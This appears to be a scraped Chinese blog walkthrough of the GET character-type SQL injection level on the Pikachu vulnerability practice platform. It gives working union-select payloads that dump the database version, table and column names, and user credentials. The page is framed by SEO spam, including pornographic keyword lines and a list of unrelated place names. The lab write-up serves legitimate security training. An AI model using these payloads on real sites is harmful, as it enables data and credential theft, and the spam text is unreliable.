五月天青色头像情侣网名,国产亚洲av片在线观看18女人,黑人巨茎大战俄罗斯美女,扒下她的小内裤打屁股

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊

Pikachu 漏洞練習(xí)平臺(tái)Sql Injection字符型注入(get)通關(guān)指南pika~pika~

2023-03-09 00:28 作者:Yukito_online  | 我要投稿

ok,廢話不多說,上菜!

字符型注入的檢測方式和數(shù)字型差不多只是多加了一個(gè)引號有時(shí)還需要閉合括號

burp和postman我懶得開了,hackbar就夠了,可以去Firefox擴(kuò)展商店下載一個(gè)

注入點(diǎn)在name參數(shù)

輸入‘報(bào)錯(cuò),表示存在字符型注入

輸入' or 1=1--+輸出全部用戶,繼續(xù)用order by判斷字段

' order by 3--+時(shí)報(bào)錯(cuò)說明存在兩個(gè)字段

下面就是跟整數(shù)型一樣,拿庫名拿表名拿列名拿數(shù)據(jù)


' union select version(),database()--+
' union select 1,table_name from information_schema.tables where table_schema='pikachu'
' union select 1,column_name from information_schema.columns where table_name='users'--+
' union select username,password from users--+

收工,睡覺

Pikachu 漏洞練習(xí)平臺(tái)Sql Injection字符型注入(get)通關(guān)指南pika~pika~的評論 (共 條)

分享到微博請遵守國家法律
芮城县| 历史| 富裕县| 博乐市| 漳平市| 白河县| 桦甸市| 资溪县| 石城县| 连城县| 沙田区| 出国| 南木林县| 塔城市| 横山县| 左贡县| 万山特区| 罗定市| 喜德县| 盐边县| 黄梅县| 连云港市| 化德县| 巴楚县| 黄平县| 沁阳市| 蓬莱市| 仁怀市| 吉安县| 名山县| 寿光市| 新河县| 北碚区| 闽清县| 灵武市| 濮阳市| 宁蒗| 洪湖市| 东光县| 长葛市| 扶沟县|